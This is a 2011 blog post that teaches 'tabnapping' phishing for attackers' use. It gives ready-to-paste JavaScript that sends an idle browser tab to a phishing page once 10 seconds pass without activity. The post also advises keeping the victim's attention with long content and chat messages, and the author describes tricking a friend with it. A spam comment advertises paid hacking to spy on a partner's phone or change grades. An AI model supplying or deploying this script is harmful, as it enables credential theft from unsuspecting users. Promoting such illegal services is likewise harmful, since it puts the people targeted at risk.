Sunday, July 24, 2011

Tab Napping(Phishing Attack)

Theory Behind Tabnapping(please read this to understand)
How many times you have opened several tabs and forget to go to the other tabs. Because of this ignorance of victim, hacker can actually redierect the idle tab to their phishing page. And in many cases victim doesn't bother to see the URL of the page. In simple words its just a trick to confuse the user in multiple tabs.
You may be thinking why any one will login to the page if he/she didn't request it. Well, I want to ask one question: What you will do if you have Facebook login page in front of you? its our nature.


Tabnapping is done by javascript. Its all about relation of two pages, say pageA and pageB. Consider pageA is the page which is being opened in a tab and pageB is our phishing page. Now by some mechanism the pageA must be redirect to pageB(phishing page), so how to do it?

The first thing we can do is we can use setInterval() function of javascript
Example:-timerRedirect=setInterval("location.href='http://www.gmail.com'",10000); specify this in the script section this will not effect the code, its work is to redirect the page to gmail.com after 10 seconds.
But you need to redirect the page only if the page is idle so how to do it? Don't worry i have the code for that, just copy and paste the below code in your page's(pageA as per the example) "head" section.Note:-replace gmail.com with your phishing page URL. Learn how to create phishing page: Click Here.


Javascript(copy it in head section)
<script type="text/javascript">
var xScroll, yScroll, timerPoll, timerRedirect, timerClock;
function initRedirect(){
  if (typeof document.body.scrollTop != "undefined"){ //IE,NS7,Moz
    xScroll = document.body.scrollLeft;
    yScroll = document.body.scrollTop;
    clearInterval(timerPoll); //stop polling scroll move
    clearInterval(timerRedirect); //stop timed redirect
    timerPoll = setInterval("pollActivity()",1); //poll scrolling
    timerRedirect = setInterval("location.href='http://www.gmail.com'",10000); //set timed redirect
   
  }
  else if (typeof window.pageYOffset != "undefined"){
    xScroll = window.pageXOffset;
    yScroll = window.pageYOffset;
    clearInterval(timerPoll); //stop polling scroll move
    clearInterval(timerRedirect); //stop timed redirect
    timerPoll = setInterval("pollActivity()",1); //poll scrolling
    timerRedirect = setInterval("location.href='http://www.gmail.com'",10000); //set timed redirect
   
  }
  //else do nothing
}
function pollActivity(){
  if ((typeof document.body.scrollTop != "undefined" && (xScroll!=document.body.scrollLeft || yScroll!=document.body.scrollTop)) //IE/NS7/Moz
   ||
   (typeof window.pageYOffset != "undefined" && (xScroll!=window.pageXOffset || yScroll!=window.pageYOffset))) { //other browsers
      initRedirect(); //reset polling scroll position
  }
}
document.onmousemove=initRedirect;
document.onclick=initRedirect;
document.onkeydown=initRedirect;
window.onload=initRedirect;
window.onresize=initRedirect;
</script>


Upload your page with javascript in a website. Now the only thing you have to do is give him your page(pageA). Now a little tip: Don't let him close your page, keep some interesting article or bunch of funny pictures or anything interesting just don't let him close the tab make your article bit lengthy, so that victim does'nt complete in once(Again use your head).


I would rather like to share, how I applied this technique:- I shared my page(article included above javascript) link while chatting with a friend, and I just made him read my article. While he was reading I started sending msgs in the chat box, so he must come to answer me right? Now just I had to do is hang him in chat for minute or two, and my job is done..

Click Here to see the demo page.



1 comment:

  1. If you need to hire a real hacker to help spy on your partner's cell phone remotely, change your grades or boost your credit score. Contact this helpline +1 347.857.7580 or the email address expressfoundations@gmail.com

    ReplyDelete